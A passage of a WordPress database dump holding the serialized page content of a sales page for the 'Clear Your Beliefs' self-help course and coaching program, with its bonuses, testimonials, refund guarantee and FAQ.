class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1580, 2026, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will 